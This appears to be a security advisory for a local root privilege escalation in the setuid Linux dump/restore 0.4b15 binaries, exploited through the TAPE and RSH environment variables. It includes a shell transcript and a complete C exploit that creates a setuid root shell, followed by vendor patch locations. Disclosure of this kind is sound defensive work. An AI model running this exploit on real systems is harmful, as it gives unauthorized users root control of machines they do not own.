COMMAND

    dump

SYSTEMS AFFECTED

    dump-0.4b15

PROBLEM

    Mat found the following.  The Linux dump command executes an external
    program with suid privilege.  Example:

        [mat@localhost mat]$ export TAPE=garbage:garbage
        [mat@localhost mat]$ export RSH=/home/mat/execute_this
        [mat@localhost mat]$ cat > /home/mat/execute_this
        #!/bin/sh
        cp /bin/sh /home/mat/sh
        chmod 4755 /home/mat/sh
        [mat@localhost mat]$ chmod 755 /home/mat/execute_this
        [mat@localhost mat]$ /sbin/dump -0 /
          DUMP: Connection to garbage established.
          DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
          DUMP: Date of last level 0 dump: the epoch
          DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
          DUMP: Label: none
        /dev/hda2: Permission denied while opening filesystem
         [mat@localhost mat]$ ls -la /home/mat/sh
         -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
         [mat@localhost mat]$ /home/mat/sh
         bash# id
         uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)

    This is a quick and dirty exploit:

    /*
    **
    **  dump-0.4b15x.c
    **
    **  dump-0.4b15 exploit:
    **  Redhat 6.2 dump command executes
    **  external program with suid privilege.
    **
    **  affected:
    **     /sbin/dump
    **     /sbin/dump.static
    **     /sbin/restore
    **     /sbin/restore.static
    **
    **  Bug found by mat@hacksware.com
    **
    **  This example was coded by md0claes@mdstud.chalmers.se
    **  It was written for EDUCATIONAL PURPOSES ONLY.
    **
    **
    */


    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>

    #define RUNME     "/tmp/runme"      /* tmp file */
    #define SUID_PATH "/tmp/superdude" /* the power of root */

    /*
    ** Print the command-line synopsis to stdout.
    ** pname is the program name as invoked (argv[0]); it is only echoed,
    ** never parsed.
    */
    void usage(char *pname)
    {
     static const char *const option_lines[] = {
      "  d - exploit /sbin/dump\n",
      "  s - exploit /sbin/dump.static\n",
      "  r - exploit /sbin/restore\n",
      "  p - exploit /sbin/restore.static\n\n",
     };
     size_t i;

     printf("\nUsage: %s < d | s | r | p >\n\n", pname);
     for (i = 0; i < sizeof option_lines / sizeof option_lines[0]; i++) {
      fputs(option_lines[i], stdout);
     }
    }

    /*
    ** Entry point.  Reproduces the issue described above: the setuid dump /
    ** restore binaries of dump-0.4b15 run the program named by the RSH
    ** environment variable when TAPE names a remote host, without dropping
    ** privilege.  The vendor fix listed under SOLUTION was to stop shipping
    ** dump setuid root.
    **
    ** argv[1] selects which of the four binaries is run (see usage()).
    ** envp is passed through unchanged to the final execve(); the child
    ** that runs the target binary gets bad_env as its entire environment.
    ** Returns 1 via exit() on any argument or syscall error; exit(0) is only
    ** reached if the final execve() fails, and that failure is not reported.
    */
    int main(int argc, char *argv[], char *envp[])
    {
     int fd;
     pid_t pid;
     /* Same TAPE/RSH pair as in the shell transcript above.  execle()
     ** makes this the whole environment of the child, so nothing else
     ** (PATH, HOME, ...) is inherited by the target binary. */
     char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME };
     /* Contents of the helper script written to RUNME.  Adjacent string
     ** literals are concatenated by the compiler; runbuf is NUL-terminated. */
     char   runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash "
                        SUID_PATH "\nchmod 6755 " SUID_PATH };

     /* argv for the final execve() of SUID_PATH. */
     char *suid[] = { SUID_PATH, NULL };
     /* av[0] is the path passed to execle(); av[1..3] become the target's
     ** argv[0..2].  Defaults cover the 'p' case; other cases overwrite. */
     char   *av[] = { "/sbin/restore.static", "restore.static",
                      "-t", "/tmp/foo" };

     if (argc != 2) {
      usage(argv[0]);
      exit(1);
     }

     /* NOTE(review): tolower() is used without including <ctype.h>; this
     ** relies on an implicit declaration, which C99 and later reject. */
     switch(tolower(argv[1][0])) {

      case 'd':
       av[0] = "/sbin/dump";
       av[1] = "dump";
       av[2] = "-0";
       av[3] = "/";
       break;

      case 's':
       av[0] = "/sbin/dump.static";
       av[1] = "dump.static";
       av[2] = "-0";
       av[3] = "/";
       break;

      case 'r':
       /* av[2], av[3] keep the "-t", "/tmp/foo" defaults. */
       av[0] = "/sbin/restore";
       av[1] = "restore";
       break;

      case 'p':
       /* Defaults already name /sbin/restore.static. */
       break;

      default:
       usage(argv[0]);
       exit(1);
     }

     /* The call is open(), but the error is labelled "fopen". */
     if ((fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755)) == -1) {
      perror("fopen");
      exit(1);
     }

     /* sizeof(runbuf) counts the terminating NUL, so one NUL byte is
     ** written after the script text as well.  A short write is not
     ** detected: only -1 is treated as failure. */
     if (write(fd, runbuf, sizeof(runbuf)) == -1) {
      perror("write");
      exit(1);
     }
     close(fd);

     if ((pid = fork()) < 0) {
      perror("fork");
      exit(1);
     }

     /* Child: run the chosen setuid binary with the crafted environment.
     ** av[3] is always passed, so the target sees three arguments. */
     else if (pid == 0) {
      if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {
       perror("execle");
       _exit(1);
      }
     }

     /* Parent: there is no wait() on the child; a fixed one-second delay
     ** is the only synchronisation before the helper script is removed.
     ** unlink() and execve() results are not checked. */
     sleep(1);
     unlink(RUNME);
     fprintf(stdout, "\nExploited %s \n", av[0]);
     fprintf(stdout, "Running " SUID_PATH "\n");
     execve(SUID_PATH, suid, envp);

     /* Only reached when execve() above failed. */
     exit(0);
    }

SOLUTION

    This is the location for the latest version

        ftp://ftp.sourceforge.net/pub/sourceforge/dump/

    dump is no longer suid root.

    For RedHat:

        ftp://updates.redhat.com/5.2/alpha/dump-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/dump-static-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/rmt-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/sparc/dump-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/dump-static-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/rmt-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/i386/dump-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/dump-static-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/rmt-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/SRPMS/dump-0.4b19-5.5x.src.rpm
        ftp://updates.redhat.com/6.2/alpha/dump-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/dump-static-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/rmt-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/sparc/dump-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/dump-static-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/rmt-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/dump-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/dump-static-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/rmt-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/SRPMS/dump-0.4b19-5.6x.src.rpm

    All released versions  of Trustix Secure  Linux contain a  version
    of dump that is known to  have a local root exploit.   People with
    untrusted local users should upgrade as soon as possible.  Get the
    packages at:

        ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/
        http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
             dump-0.4b19-2tr.i586.rpm
             rmt-0.4b19-2tr.i586.rpm

    Conectiva's last mandatory update of the dump package brought it up
    to version 0.4b18 and had the SUID bits disabled.  These packages
    do not have the vulnerability discussed above.